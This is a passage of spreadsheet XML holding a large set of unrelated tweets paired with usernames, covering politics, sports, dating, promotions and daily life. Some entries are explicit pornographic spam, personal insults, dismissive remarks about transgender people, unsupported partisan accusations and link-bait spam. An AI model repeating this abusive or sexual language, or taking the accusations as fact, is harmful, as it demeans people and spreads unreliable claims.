    <t>NBA shows 'no spine' regarding China's alleged human rights abuses: Fox Sports Radio's Clay Travis https://t.co/1WDuQ23L91 If the NBA wants 300 million chinese people money move 2fucking China. NIKE sell all yr apparel 2 the chinese. Done with NIKE. AMERICANS DONT BUY/WEAR NIKE</t>
  </si>
  <si>
    <t>Skeptical_Mom</t>
  </si>
  <si>
    <t>@SSorensenxo @masterstrack @rachelvmckinnon Motives for transitioning are irrelevant, a male is still a male even after transition and therefore does not qualify to be a competitor in female sports.</t>
  </si>
  <si>
    <t>theIn4mous</t>
  </si>
  <si>
    <t>@HolesomeMichael @JennSlowpez Don’t forget the bakery she opens up</t>
  </si>
  <si>
    <t>RobertDwyer</t>
  </si>
  <si>
    <t>If you like bold Spanish reds like Clio, Alto Moncayo, and Juan Gil - check out Brega from Jorge Ordonez Selections. A 16.5% monster but it carries it well. I purposely didn’t check retail prices, but I’d say it drinks like $40+. Outstanding. Sample for review. https://t.co/5lFqpVBxvu</t>
  </si>
  <si>
    <t>CzarFales</t>
  </si>
  <si>
    <t>Even in the professional freelance world it’s the 1st and the viola who arrive last</t>
  </si>
  <si>
    <t>Gunchi_sFoD</t>
  </si>
  <si>
    <t>@Godisyn @MLG_Gizmo @REVAKUN @TBGDiablo @AyoCole_ Game and link cord</t>
  </si>
  <si>
    <t>EdgeLSeawolf</t>
  </si>
  <si>
    <t>@VonnyOsborn @sassywindsor What I don't get is how the Real @DNC members are allowing the party to be taken over by #Socialist. Where is their outrage over this takeover? I've never heard of a #DemocratSocialist before have you? They need to kick them out of their Party. https://t.co/0u1I3mPbcV</t>
  </si>
  <si>
    <t>MaizeAndHoney</t>
  </si>
  <si>
    <t>Maize and Honey is now on Pinterest! Follow us across social media for new recipes and dishes! https://t.co/Tc0V0cW1oa</t>
  </si>
  <si>
    <t>Quarterbridge</t>
  </si>
  <si>
    <t>The latest Markets and Food News! https://t.co/hvR231EHhW Thanks to @CAMRA_Official @HughFW @spitalfieldsE1 #waronplastic #ourplasticfeedback</t>
  </si>
  <si>
    <t>sarahbrow_nn</t>
  </si>
  <si>
    <t>Our standard signage and navigation of public space is ruled by the English language. What if we explored how to make space accessible to all languages and abilities? #MobilityJustice https://t.co/mG9mO4bhPY</t>
  </si>
  <si>
    <t>TheCloneOfAlex</t>
  </si>
  <si>
    <t>Reading Peter Hook's book about Joy Division and it's so refreshing to have something free of clichés and hear say and just telling it how it was. #UnknownPleasures @peterhook</t>
  </si>
  <si>
    <t>purpleclaire</t>
  </si>
  <si>
    <t>.@BradleyWhitford I think it’s the beard.. it lends therapeutic authority somehow?!</t>
  </si>
  <si>
    <t>falgal</t>
  </si>
  <si>
    <t>@sadams_s @Nigel_Farage They deserve it after their last 3 yrs of whining, leave voters have had to put up with that ghastly EU rag shoved in their faces on their TV screens for the last 3 yrs, accompanied by that foghorn shouting stop Brexit. Uggg 🇬🇧🇬🇧🇬🇧😊</t>
  </si>
  <si>
    <t>JosephLansdell</t>
  </si>
  <si>
    <t>Switched from CG photo to Wabash. Bittersweet #WAF #NewProfilePic</t>
  </si>
  <si>
    <t>MGreat4ever</t>
  </si>
  <si>
    <t>@RepKendraHorn @ConcordC Why are you supporting impeachment without a vote? You’re the only Oklahoma representative in the majority party making you the only person OK person that can move for a vote in your caucus mtg. Show OK that you stand for fairness otherwise you stand with Pelosi and AOC.</t>
  </si>
  <si>
    <t>mattdl68</t>
  </si>
  <si>
    <t>@ewarren And you are delusional plain an simple. I love how all the candidates have TDS.</t>
  </si>
  <si>
    <t>massrealty</t>
  </si>
  <si>
    <t>How to Get Rid of Private Mortgage Insurance https://t.co/13oFWA182s https://t.co/eYIVT8XxJS</t>
  </si>
  <si>
    <t>Joshuahot4u</t>
  </si>
  <si>
    <t>Fleshlight Fucking and HOT NASTY CUM DRIPPING OUT OF THIS VERY CUM-FILLED FLESHLIGHT Pussy Toy https://t.co/cKtLX5y7RQ</t>
  </si>
  <si>
    <t>lrose41098</t>
  </si>
  <si>
    <t>@GOP @realDonaldTrump AND DUMB-OCRATS SAY IMPEACH ? THEY ARE COMPLETELY INSANE !</t>
  </si>
  <si>
    <t>CPC2019Election</t>
  </si>
  <si>
    <t>When friends or associates talk about Trudeau.....show them this news media story or copy and paste it for Airdropping, emailing or posting to social media. Read about Justin Trudeau from a former Liberal insider Warren Kinsella. https://t.co/XG7vEJJcVM</t>
  </si>
  <si>
    <t>4annegs</t>
  </si>
  <si>
    <t>@PatriotCindy195 Right!! All the MORE reason to investigate before they take office!! Biden had to step down last time over his ethics! Who plagarizes and thinks they won't get caught... Only someone as arrogant as Biden!</t>
  </si>
  <si>
    <t>madelynbenwaren</t>
  </si>
  <si>
    <t>EPUB Download Free The Stolen Twin &gt;&gt; https://t.co/GsWtFClm1j</t>
  </si>
  <si>
    <t>semrush</t>
  </si>
  <si>
    <t>@SamPHarries thank you for joining us again, Sam! glad to see you! - Katya</t>
  </si>
  <si>
    <t>ElGrandePadre3</t>
  </si>
  <si>
    <t>I'm really looking forward to all of these new things in my favorite game, #StreamRaiders , and I have a lot of opinions on how to make it better. Super duper excited for mobile access and PVP, and I can't wait to see all the other features too! https://t.co/l6RcPuMlQd</t>
  </si>
  <si>
    <t>JohnLaffleur</t>
  </si>
  <si>
    <t>@GOPChairwoman @realDonaldTrump @SteveScalise I guess it's from the #Republicans playbook. Now protect #TrumpTowers in #İstanbul #Turkey we know the #Kurds don't stay there. The #KurdsBetrayed the @GOP</t>
  </si>
  <si>
    <t>tmoni___</t>
  </si>
  <si>
    <t>You ever check your dms and notice all the bags ya fumbled☠️ don’t really be carin ig</t>
  </si>
  <si>
    <t>DeeToTheV</t>
  </si>
  <si>
    <t>@Captain_jimjam @peoplesvote_uk ... Cameron was wrong to say we'll respect it no matter what because we didn't know what was actually being voted for. Now we know, we should get a final say. That's just seems obvious to me but maybe I'm wrong? I'm always open to discussion but yet to hear a convincing argument.</t>
  </si>
  <si>
    <t>suukii</t>
  </si>
  <si>
    <t>D punkacademic thanks for the follow!</t>
  </si>
  <si>
    <t>_Lucia_Art_</t>
  </si>
  <si>
    <t>Summertime Record really makes me feel man. I don't even know the characters that well but oohhh boy. That song.</t>
  </si>
  <si>
    <t>BratXeno</t>
  </si>
  <si>
    <t>@Hbomberguy @patrickhwillems MFW the social anxiety kicks in.</t>
  </si>
  <si>
    <t>AUG_OFS</t>
  </si>
  <si>
    <t>The difference between mentorship and sponsorship #MedEd #FacultyDevelopment #AcademicMedicine @AUG_University @AUG_LLD @AUG_WeAreHR @MCG_AUG @FSUFaculty @CMUforsuccess @UCDavisFDD @MayoFacDev @harvardmacy https://t.co/pYIcOgtaI2</t>
  </si>
  <si>
    <t>TDunsparce</t>
  </si>
  <si>
    <t>@mycatkillsnazis i just tried zombie flavored skittles and heads up zombies taste bad so im judging you have bad taste</t>
  </si>
  <si>
    <t>HeidiGASL</t>
  </si>
  <si>
    <t>@KipHottman @ChristieNold @NatGeoEducation @drvickip @meme3rat @AshleyLambS @notbradclark @Alaska_TOY2018 @triciaebarvia @iscott4 @mrpiercEy I'm ready to party, I mean learn along side you 😁😂</t>
  </si>
  <si>
    <t>LyviaRoark</t>
  </si>
  <si>
    <t>Usually I wear my carhartt beanie for warmth, not fashion, but y’all are testing me this fall</t>
  </si>
  <si>
    <t>naomenai</t>
  </si>
  <si>
    <t>I'm not gonna accept a 2 year old smashing up his sand castles, drawing all over his pictures, smashing items in every house she visits, never being told no or to leave other kid's shit alone. She's a toddler, she will do that shit but she will only continue because you allow it</t>
  </si>
  <si>
    <t>iluv_me_moe</t>
  </si>
  <si>
    <t>Changes are afoot in your field, workplace, or community, turn... More for Pisces https://t.co/kV3APLHtoS</t>
  </si>
  <si>
    <t>sherjenbuckler</t>
  </si>
  <si>
    <t>@ChadPergram That's because the hag knows she can't win on this lie.</t>
  </si>
  <si>
    <t>xYohBe</t>
  </si>
  <si>
    <t>@MadeByXXX @FortniteGame That's what there good at is killing there game. Yet everyone still plays the trash I cant wait for halo on PC and this game is a thing of the past.</t>
  </si>
  <si>
    <t>johnathanpach10</t>
  </si>
  <si>
    <t>I’ll really make a women one of the happiest females in the world on God 💯</t>
  </si>
  <si>
    <t>jacksmith_1999</t>
  </si>
  <si>
    <t>@sophiesimpsonn_ I thought he just said that to me 😓😪</t>
  </si>
  <si>
    <t>jenny29lovnlife</t>
  </si>
  <si>
    <t>@ncphilanthropy9 @CSkye2610 Love that ❤️ My husband and I make a great team !</t>
  </si>
  <si>
    <t>WomenUnitedFro2</t>
  </si>
  <si>
    <t>@Pendejss25 Victory for Trump , land slide with God willing</t>
  </si>
  <si>
    <t>Stillwell2GBoy</t>
  </si>
  <si>
    <t>And I'm wrong for learning my African spirituality. What's wrong with what he said my mind is open to opinion. #FLIDAY https://t.co/0QUGjdjOfL</t>
  </si>
  <si>
    <t>issa_maliaa</t>
  </si>
  <si>
    <t>Can i just marry @oliverstarkk already ?? Like please and thank you</t>
  </si>
  <si>
    <t>DisnyRunr24</t>
  </si>
  <si>
    <t>Bring on the #DopeyChallenge #rundisney https://t.co/ULTS79BIGA</t>
  </si>
  <si>
    <t>CiiRUSVRS</t>
  </si>
  <si>
    <t>We made it through another successful year at the @vrma International Conference! See you all next year! 😄🍍 #neworleans #vrmainternational #conference #louisiana #nola #sales #networking #vacationrentalsoftware #vacationrentals #propertymanagement #vacationrentalindustry https://t.co/bWcHRCKgrc</t>
  </si>
  <si>
    <t>FirearmsPB</t>
  </si>
  <si>
    <t>@McCainJack @pptsapper What about "Hangover helicopter flying?" You may or may not be qualified for that. Of course tweet after tweet of just "Sir, STFU and let me land so I can hit the head" might get a little boring.</t>
  </si>
  <si>
    <t>SouthwarkYAs</t>
  </si>
  <si>
    <t>This is so amazing! We have hit our #2000followers ... 2002 to be exact! 😊 We could not thank each and every one of our followers for the continued support of our team. Thank you! 😊 https://t.co/Wcxs2rQ87Q</t>
  </si>
  <si>
    <t>Knewz_Currently</t>
  </si>
  <si>
    <t>No. 16 Michigan needs late surge to hold off Illinois 42-25 https://t.co/rNul983CF0 #Sports https://t.co/qTaiADkhmK</t>
  </si>
  <si>
    <t>i8two4u</t>
  </si>
  <si>
    <t>@GGWICKEDx @Animelisa_ Awesome dude!! Very hot and sensual!!!</t>
  </si>
  <si>
    <t>yagirlpsycho</t>
  </si>
  <si>
    <t>@MilanMadre_ the stallion yeah🤪🤪🤪🤪</t>
  </si>
  <si>
    <t>WingmanDraws</t>
  </si>
  <si>
    <t>@TheGentlebro @jesonite @thekilinah @Ezukart @BuxbiArts @MissMixi @SpottedTigress @Jinx_doodle @PeterandWhitney @theycallhimcake @TheHoodedDraco @cherrikissu @Chalodillo @Draconder You're a good friend and inspiration, of course she belongs there!!!! ❤️</t>
  </si>
  <si>
    <t>MedicFootprints</t>
  </si>
  <si>
    <t>Find out how this doctor went from post FY to Medico-Legal Manager in the NHS https://t.co/VLhST2muM2 https://t.co/26QRMvqALn</t>
  </si>
  <si>
    <t>soulriverss</t>
  </si>
  <si>
    <t>i’ve been up since 2:30 am... why.!?!!</t>
  </si>
  <si>
    <t>awesomephinatic</t>
  </si>
  <si>
    <t>@DennisUltima I guess it depends on the definition of blockbuster.</t>
  </si>
  <si>
    <t>laflacaaa___</t>
  </si>
  <si>
    <t>You wouldn’t slide for me</t>
  </si>
  <si>
    <t>corinerayos</t>
  </si>
  <si>
    <t>Get Free Diagnosis, Prevention and Treatment of Periodontitis &gt;&gt; https://t.co/j6ZtesVIYp</t>
  </si>
  <si>
    <t>polarcritter</t>
  </si>
  <si>
    <t>Looks like Woodbine was down over $2 million in handle for this year’s Canadian International card compared to last year, even with an extra race carded.</t>
  </si>
  <si>
    <t>chinapenguin</t>
  </si>
  <si>
    <t>"In the pink" https://t.co/3ps6f5yaym See my new daily photo on #blipfoto</t>
  </si>
  <si>
    <t>SinBinVegas</t>
  </si>
  <si>
    <t>@Tephywashere @SaucyDanielle @PPC4 Oh jeez. My bad, I was caught up in another argument about +/-.</t>
  </si>
  <si>
    <t>LLCFertco</t>
  </si>
  <si>
    <t>CR7 with the hand assault #onbrand</t>
  </si>
  <si>
    <t>thebearhurley</t>
  </si>
  <si>
    <t>@leolionzez I loved watching this!! As a person who has never played WOW you did a fantastic job explaining it all and showing off the game :)</t>
  </si>
  <si>
    <t>@bubbagump324 Manchin’s tweet is to an audience of one. He’s working for his constituents and trying to get them the pensions they were promised. It’s calculated and he’s using Trump’s preferred method of communication and language.</t>
  </si>
  <si>
    <t>michelyfreitas</t>
  </si>
  <si>
    <t>@mslr4ever Hi This is Laila my beloved dog🐶 She had 2 surgeries last summer,she was diagnosed with IVDD Intervertebral Disc Disease A Small Donation or retweet will Help us with her treatment. You can donate clicking in the link below.We Need your Help! Thank you🙏🏻 https://t.co/UttQgnn6Wf</t>
  </si>
  <si>
    <t>RubyMcrae</t>
  </si>
  <si>
    <t>@stephenlautens @DustyGrimmer He hasn't done a physical job or hobby in his lifetime. Dough Boy looks bad in anything. That's why Harper *always* wore suits, even to bed.</t>
  </si>
  <si>
    <t>theliteracytree</t>
  </si>
  <si>
    <t>Another brand new #planningsequence on our site is for @kenwilsonmax‘s awesome ‘Astro Girl’ - it’s ready to be downloaded now from our school and individual subscribers 👩🏾‍🚀🚀🌓 https://t.co/plxNlb7kaG</t>
  </si>
  <si>
    <t>Skyhighaaron</t>
  </si>
  <si>
    <t>Murphy’s Law seems to be the rule of the day. When everything ... More for Aries https://t.co/VqDwUZ5p7H</t>
  </si>
  <si>
    <t>KaraPhinney</t>
  </si>
  <si>
    <t>I toss and turn in my sleep more than any other person I know I apologize to anyone I’ve ever slept in bed next to besides my exes</t>
  </si>
  <si>
    <t>PJ_Jenno</t>
  </si>
  <si>
    <t>@LUFCDATA Best defence in the league. Great possession play. crap in the final 3rd also no plan B. games will always be close. refs always hate us but we'd miss the pen anyway, league will slip away sadly.</t>
  </si>
  <si>
    <t>WichitaCindy</t>
  </si>
  <si>
    <t>@ks4isu So you don't even *have* student loans? Wow. Maybe they hope you'll refer them to someone who does. 😄</t>
  </si>
  <si>
    <t>CoachDouglas21</t>
  </si>
  <si>
    <t>@JanetSnackson It’s because they are lame and goofy and listen to future</t>
  </si>
  <si>
    <t>oCrimson</t>
  </si>
  <si>
    <t>Ight I'm off twitter now. I expect to have 1 million+ followers when I get back from the tweets stolen from me, thank you.</t>
  </si>
  <si>
    <t>MaxHydeInPlace</t>
  </si>
  <si>
    <t>@commentiquette That playlist of videos of monkeys getting abused must have the worst comments.</t>
  </si>
  <si>
    <t>evander420</t>
  </si>
  <si>
    <t>@CatrionaArduini @edog007 303 for 1st 200ish for 2nd I'm rich!</t>
  </si>
  <si>
    <t>Donna_Beeeee</t>
  </si>
  <si>
    <t>@Chican3ry @nicolajayneh @JaneFae @ING @joss_prior @christineburns @CherylMorgan @allthingsFoust @LUBOttom Being an exploiter or the exploited in the economic sphere intersects with sex. But it does not coincide with it. Female company owners extracting surplus value from Male employees is happening.</t>
  </si>
  <si>
    <t>Yuriwebboy</t>
  </si>
  <si>
    <t>@jwomack @gillyarcht I do it all the time. It’s called hiking.</t>
  </si>
  <si>
    <t>arjungwriter</t>
  </si>
  <si>
    <t>@CordonRoma @Johnldeboer @EllaineDreams @nancybarfield @honeycakebooks @TheArtMatrix11 @barbiesway @i_Lilly0k @laliaristo @SJTurner_Author @CarolynRuffles @Wrix2 @bright_author @bytchfest Thank you for the lift Roma! Here are a few more! @itsnatfoster @BlackDragonVent @CRJSmithAuthor @MelaJRose @melodywingfield @CapeCrush @alexisxstetic @MarkCainWrites 🍁🍁🍁 https://t.co/VObgp423Mr</t>
  </si>
  <si>
    <t>Nazemi_Ali</t>
  </si>
  <si>
    <t>@JNJChem The molecule was a nice seed then!</t>
  </si>
  <si>
    <t>mmenzel765</t>
  </si>
  <si>
    <t>@GeraldoRivera @realDonaldTrump Geraldo is right about this. Question 1: What does the modern day CIA do anymore other than spy on our president? Question 2: Is Director Gina Haspel in on this too?</t>
  </si>
  <si>
    <t>kimeli</t>
  </si>
  <si>
    <t>@ewarren Give us a choice for healthcare</t>
  </si>
  <si>
    <t>ShelbieRenee16</t>
  </si>
  <si>
    <t>HAPPY 21ST BIRTHDAY @audrey_tetteh ♥️🍻 I love you so much! Thanks for always being there for me for almost a decade now. Can’t wait to get litty tomorrow! 🤪 https://t.co/O9cBMlWGpn</t>
  </si>
  <si>
    <t>NurseBotez</t>
  </si>
  <si>
    <t>@Sirenz5 @cpm5280 @HoarseWisperer A lot of words without the actual information of the “incident” just opinion about the “thing” so....</t>
  </si>
  <si>
    <t>MRGConcertsWC</t>
  </si>
  <si>
    <t>#ICYMI, @llama_ajol Amber Liu is heading to @VogueTheatre on January 23! Get your tickets ASAP to join us for a 🔥 show! 🎟https://t.co/v9UmnTbtGY https://t.co/mM885JkHWi</t>
  </si>
  <si>
    <t>Ommanilove</t>
  </si>
  <si>
    <t>@antiwarmisfit Just remind them of what happened the last time Bernie won. https://t.co/cGvo3LRm09</t>
  </si>
  <si>
    <t>vinnyanm1</t>
  </si>
  <si>
    <t>Judge tells DOJ to charge McCabe or drop investigation https://t.co/jhydV2JoX4</t>
  </si>
  <si>
    <t>AllanahBrenae</t>
  </si>
  <si>
    <t>@callmedeane_ @jakaridavonne This was to his close close friends lol</t>
  </si>
  <si>
    <t>VoooDoooBooo</t>
  </si>
  <si>
    <t>@Darth_Pingu Hotmail &amp; has 2 x’s... you know it’s going to be good bro 🤣</t>
  </si>
  <si>
    <t>OilSands_Brent</t>
  </si>
  <si>
    <t>@JeneralJustice @GretaThunberg The hypocrisy of “green energy” makes me sick. Without fossil fuel energy there would be no “green energy”. No different than electric car using coal generated electricity. However, those “green” things sure do make the gullible feel good about themselves.</t>
  </si>
  <si>
    <t>christineitmi</t>
  </si>
  <si>
    <t>@TomiLahren What are you going to do after the impeachment??🤔</t>
  </si>
  <si>
    <t>courtgolf</t>
  </si>
  <si>
    <t>@GaryLineker It's a tough call - it's become an act for the fans, but I wouldn't want to allow it on my own home turf</t>
  </si>
  <si>
    <t>1in5advocacy</t>
  </si>
  <si>
    <t>Systems failure to ensure EACH child reads/writes/spells/arithmetizes proficiently? Know better, DO better, Ms. Parks. We all know many students do not test well, but standardized tests ARE a reflection of how effective (ineffective) Teachers DELIVER their pedagogy. Stop ....</t>
  </si>
  <si>
    <t>tristandross</t>
  </si>
  <si>
    <t>@GavinHJackson the fabled repentant brexiteer</t>
  </si>
  <si>
    <t>shillcock_paul</t>
  </si>
  <si>
    <t>@rowenamason And he believed him because....?</t>
  </si>
  <si>
    <t>prophetokounmpo</t>
  </si>
  <si>
    <t>@AstronautChris @DannyLeroux @Adam_Mares Yeah but I'll take losing 4 straight as a better indicator of Torontos actual skill level than the fact that the cavs just happened to shoot it well that series.</t>
  </si>
  <si>
    <t>DaysLeft4Trump</t>
  </si>
  <si>
    <t>@SteveScalise @VP 1 Year, 3 Months, 18 Days, and 48 Minutes</t>
  </si>
  <si>
    <t>ChasDBoyle</t>
  </si>
  <si>
    <t>@Kennymack1971 And the world has turned against hi. That matters. And he deserves it. That matters even more.</t>
  </si>
  <si>
    <t>DennisNickell4</t>
  </si>
  <si>
    <t>@dad_darius @ellievan65 Don't sweat the bots.</t>
  </si>
  <si>
    <t>baelngiaca</t>
  </si>
  <si>
    <t>2020 would be so good if i wasnt poor and stupid</t>
  </si>
  <si>
    <t>larryk101969</t>
  </si>
  <si>
    <t>@sextoyspolitics There is Only 2 Genders that is All and Myself and most People don't give A crap what You do with Your Private Parts or what You Combine them with for pleasure. But We Cannot &amp; will not Alter reality just To please the few and confused People</t>
  </si>
  <si>
    <t>DTPORGE</t>
  </si>
  <si>
    <t>*Business for American Promise - American Promise: https://t.co/V7QToLGG2P</t>
  </si>
  <si>
    <t>Barack and Michelle Obama post sweet tributes to each other on their anniversary https://t.co/ygGhdIxnlJ https://t.co/x6DveKsBdq</t>
  </si>
  <si>
    <t>ITJobsNews</t>
  </si>
  <si>
    <t>Only 2 prizes left! Take part in our IT Salary Survey 2019 and be in for a chance to win our last Google Home or an Apple Watch Series 4! Plus, you’ll also find out how you pay compares to your IT peers. https://t.co/bphrJtKPuH https://t.co/bBaphzHttD</t>
  </si>
  <si>
    <t>N00432</t>
  </si>
  <si>
    <t>@realDonaldTrump Donald Trump is helping cultivate a new world order predicated on peace and justice! Donald Trump loves the people and works on their behalf! The American people are lucky to have such a great and noble man championing their cause! #KAG #Trump2020 #Peace</t>
  </si>
  <si>
    <t>laurenlinebach</t>
  </si>
  <si>
    <t>I NEED A DALLAS DATE QUEEN💋💋 @LanaDelRey /// Lana Del Rey has added 11 new dates to her US tour roster https://t.co/WIbSRktmlL</t>
  </si>
  <si>
    <t>4thstfinds</t>
  </si>
  <si>
    <t>Check out what I just added to my closet on Poshmark: Michigan Special Olympics Ladies Fleece Green S. https://t.co/meceyD9ziO via @poshmarkapp #shopmycloset</t>
  </si>
  <si>
    <t>sampi_martoo</t>
  </si>
  <si>
    <t>@adambspencer I thought this was a joke then realised you’re serious. This is just an elaborate way of saying “ I think disabled people are inferior to me so I’m going to treat them like they’re someone’s pet”</t>
  </si>
  <si>
    <t>Space_Budgie</t>
  </si>
  <si>
    <t>My exhusband made me feel so shitty about myself. Would always pick on me when I gained weight. Ive always been a chubby person, so it was always easy to gain weight after I lost a few good pounds. I feel better about myself but still struggle some days. 3/3 https://t.co/5ijQP3zud2</t>
  </si>
  <si>
    <t>filmpitchbot</t>
  </si>
  <si>
    <t>"The Chronicles of Dumbledore"</t>
  </si>
  <si>
    <t>KWHomeTown</t>
  </si>
  <si>
    <t>We are looking for a buyer on 7811 Peters Pike #ButlerTownship #OH #realestate https://t.co/84EE2S2XfP https://t.co/V4u9HyMwAW</t>
  </si>
  <si>
    <t>MattClark271</t>
  </si>
  <si>
    <t>@BrizzyVoices By the way, meant to say earlier. Really like the new profile pic too. Really cool.</t>
  </si>
  <si>
    <t>Twitsham83</t>
  </si>
  <si>
    <t>@MrRyanLeister I think he’d be fine to be honest</t>
  </si>
  <si>
    <t>Badgirlsbedhead</t>
  </si>
  <si>
    <t>@TenoverDenise I don’t care if she’s a slut; I care that she cheats. She can bang the whole town if she wants but doing it behind his back is the shitty part</t>
  </si>
  <si>
    <t>Wilson_HISD</t>
  </si>
  <si>
    <t>Let’s get the message out this week! Mon: Say Hey Day 👋😀 Tues: Random Acts of Kindness Day 🤜🏽🤛🏼 Wed: Hello Global Day (say hello in a different language🌎🗣) Thurs: Acknowledgements All Day Fri: No One Eats Alone Day 🧑🏻🍱👦🏾 https://t.co/aAaHhGxPel</t>
  </si>
  <si>
    <t>dahliadumont</t>
  </si>
  <si>
    <t>#TheBlueDahliaMusic on #French #nationalnews #le20H! @TF1 https://t.co/fY5WZi4B0I (I sing my song #Oblivion with Raf at about 4:36 seconds!) For a restaurant on my corner in #Clichy92 #OneEach dedicated to #solidarity and #community! #TF1leMag #le20H</t>
  </si>
  <si>
    <t>Chelstar88</t>
  </si>
  <si>
    <t>Just finished a Ride on Strava for 19 minutes, 31 seconds going 6873.1m. https://t.co/bA6GCSB9fn https://t.co/TULpdSDWVA</t>
  </si>
  <si>
    <t>ruco_mon</t>
  </si>
  <si>
    <t>@Education4Libs AG Barr and US Attorney Durham are prowling... I can hear the music... https://t.co/Hwn47jCbHI</t>
  </si>
  <si>
    <t>SB11579</t>
  </si>
  <si>
    <t>Got him yesterday. Name is Simba (like #LionKing) #simba PS sorry I've been inactive I've been #movingagain. Still unpacking... 😕🙁 Also, I'm more active on my Instagram so go give me a follow there if you wanna see what I'm up to regularly.. https://t.co/pNexfAp7ca</t>
  </si>
  <si>
    <t>MarcScott</t>
  </si>
  <si>
    <t>You know what'll keep you warm and fashionable this winter? A #voiceover hoodie. Oh, and did I mention it's a great marketing tool as well? Shop for your size and color now at https://t.co/yr8LB6NCOp https://t.co/pfqoM98A5Z</t>
  </si>
  <si>
    <t>reddeerdir</t>
  </si>
  <si>
    <t>'Start Here': Trump lashes out against impeachment and Bernie Sanders hospitalized https://t.co/QlQHkGt8RY https://t.co/ZbB62f4d5k</t>
  </si>
  <si>
    <t>bunnyhugger75</t>
  </si>
  <si>
    <t>@Zigmanfreud There aren’t enough eye roll GIFs in the world to insert here.</t>
  </si>
  <si>
    <t>GavinHallPhoto</t>
  </si>
  <si>
    <t>@Channel4News Perhaps people could stop to consider the human condition before and after fossil fuels. Every last health outcome is better for humans now than it was before we burned fossil fuels.</t>
  </si>
  <si>
    <t>jasonfetter</t>
  </si>
  <si>
    <t>@bullyray5150 lets talk about the real controversy here. If you have all that stuff on bray why would you use a sledgehammer vs grabbing brays big ass mallet?</t>
  </si>
  <si>
    <t>cluh_ray</t>
  </si>
  <si>
    <t>It’s spooky season &amp; I’m looking for a boo https://t.co/rSXt7yZLIm</t>
  </si>
  <si>
    <t>ReginaValero</t>
  </si>
  <si>
    <t>I can’t wait to graduate and start living my best life</t>
  </si>
  <si>
    <t>Shecalledmedope</t>
  </si>
  <si>
    <t>Airbnb and we gone fill it up with vibes📽</t>
  </si>
  <si>
    <t>GYPTXVN</t>
  </si>
  <si>
    <t>i still havent heard the beast coast project smh i needa listen rn ngl</t>
  </si>
  <si>
    <t>Zucchinna</t>
  </si>
  <si>
    <t>@coffee_minion @TheCiroth @ProgDownTicket @Rockin_crocs @LilyTigerRules @yoclockface @1nicholedejesus @meerkatrodeo it's extremely detailed, you clearly didn't read it. but then again, you haven't read any of the links you sent either, so big shocker</t>
  </si>
  <si>
    <t>SeanPet94753707</t>
  </si>
  <si>
    <t>@ThrillingJon Bro point blank manny went out and hired a bunch of Jon Richts they are horrible. All the fans knew thier qb runs runs runs and we couldn’t stop nothin which let me know they don’t watch film at UM so indiscipline</t>
  </si>
  <si>
    <t>catharticjosh</t>
  </si>
  <si>
    <t>Daily return and sharpe ratio of just buying and holding the S&amp;P500 throughout 2019 via https://t.co/X4kc4VzK8t</t>
  </si>
  <si>
    <t>InvisionGameCom</t>
  </si>
  <si>
    <t>Benjamin checks out Ni No Kuni: Wrath of the White Witch Remastered on the Playstation 4 for his latest Review https://t.co/ZpZ53y8AGP #gamereview #gamedev #gamingnews</t>
  </si>
  <si>
    <t>JustMe__NiNi</t>
  </si>
  <si>
    <t>@lucid10808 @jeythecolorista @chadlismyname @mzmilkshake02 @es0hes @Mulaan17 @trappin4russell No I expect people to not come at someone for disrespecting some’s decision as you disrespect someone’s belief. At the end of the day these two beliefs can’t be argued because one comes from science and one is religious/morality. Science doesn’t automatically trump everything</t>
  </si>
  <si>
    <t>nikki_tkv</t>
  </si>
  <si>
    <t>@DonaldJTrumpJr @KamalaHarris Sooooooo triggered by women who are so intellectually superior to you it’s so embarrassing for you and your micro dick.</t>
  </si>
  <si>
    <t>ShayC_xo18</t>
  </si>
  <si>
    <t>Affable, chummy energy is lively and plentiful today. A meetin... More for Gemini https://t.co/UUNp3ieFqS</t>
  </si>
  <si>
    <t>Blessup_4ever</t>
  </si>
  <si>
    <t>@Jamarcas5 Mannn I’m gonna need u to rearrange my guts 🎁😈</t>
  </si>
  <si>
    <t>MinaAllen18</t>
  </si>
  <si>
    <t>@JoeBiden Joe your acting like the school bully your family did wrong not the trumps you have been caught and now your trying to pass the the blame time to man up and face the same consequences as we would what is it the dems motto no one is above the law not even the bidens</t>
  </si>
  <si>
    <t>noks57</t>
  </si>
  <si>
    <t>I wish nothing but the best to all of my wonderful friends</t>
  </si>
  <si>
    <t>Rozza42</t>
  </si>
  <si>
    <t>@DudeyRhino @kapilamin Our pedo Geography teacher ended up getting sent down</t>
  </si>
  <si>
    <t>RobertKaye822</t>
  </si>
  <si>
    <t>@youlooklikeamom Is this supposed to be a punishment? This feels like a reward 🤷🏼‍♂️</t>
  </si>
  <si>
    <t>BennettEmpty</t>
  </si>
  <si>
    <t>@shailinthomas I always thought it was funny that devices like pacemakers and breast implants have their company’s logo. Then I realized it’s a genius marketing ploy to advertise to anatomists, med students, and serial killers. #conspiracytheory</t>
  </si>
  <si>
    <t>bigbeeeee_</t>
  </si>
  <si>
    <t>the person that told ME that EYE needed a safe space blocked ME on facebook. tissue paper ass. don’t dish what you can’t take</t>
  </si>
  <si>
    <t>Cybersoulja</t>
  </si>
  <si>
    <t>I see the Lebron thing. It's too late for me to be argumentative right now tho. Maybe tomorrow.</t>
  </si>
  <si>
    <t>UTTylerWBB</t>
  </si>
  <si>
    <t>Next is sophomore point guard @_tyoualreadyknw. Ty is a lockdown defender, and an incredible teammate! #NPND💎#GHETstrong💪#PatriotNation🦅 https://t.co/mIWE7tqAJK</t>
  </si>
  <si>
    <t>WiccaChat</t>
  </si>
  <si>
    <t>Image from page 89 of “The Phynodderree, and other legends of the Isle of Man” (1882) https://t.co/trIxK11USS https://t.co/PhKL8kleRz</t>
  </si>
  <si>
    <t>SQLZelda</t>
  </si>
  <si>
    <t>I am *not* a morning person, but I woke up early to make some progress on an unfinished task. It has been nice getting some things done before the work day started. #SQLSelfCare #SQLWin</t>
  </si>
  <si>
    <t>We've totted up all Earth's carbon - and 99 per cent is underground https://t.co/ZSZtDXesDm #EdChat</t>
  </si>
  <si>
    <t>miguueelitoo</t>
  </si>
  <si>
    <t>finally accepted shit. sleepless nights, weight loss, episodes are on the way but hey frest start. bye for now! 🙏🏻</t>
  </si>
  <si>
    <t>LilyEPloski</t>
  </si>
  <si>
    <t>@brycetache How ever Dem doesn't campaign with the fact they do not support Concentration Camps is beyond me........</t>
  </si>
  <si>
    <t>ellielouisaxx</t>
  </si>
  <si>
    <t>all I ever want to do is go out for my tea or go for nights away, wouldn’t mind but I don’t have the bank balance to follow this lifestyle 🥺</t>
  </si>
  <si>
    <t>DariusJamel</t>
  </si>
  <si>
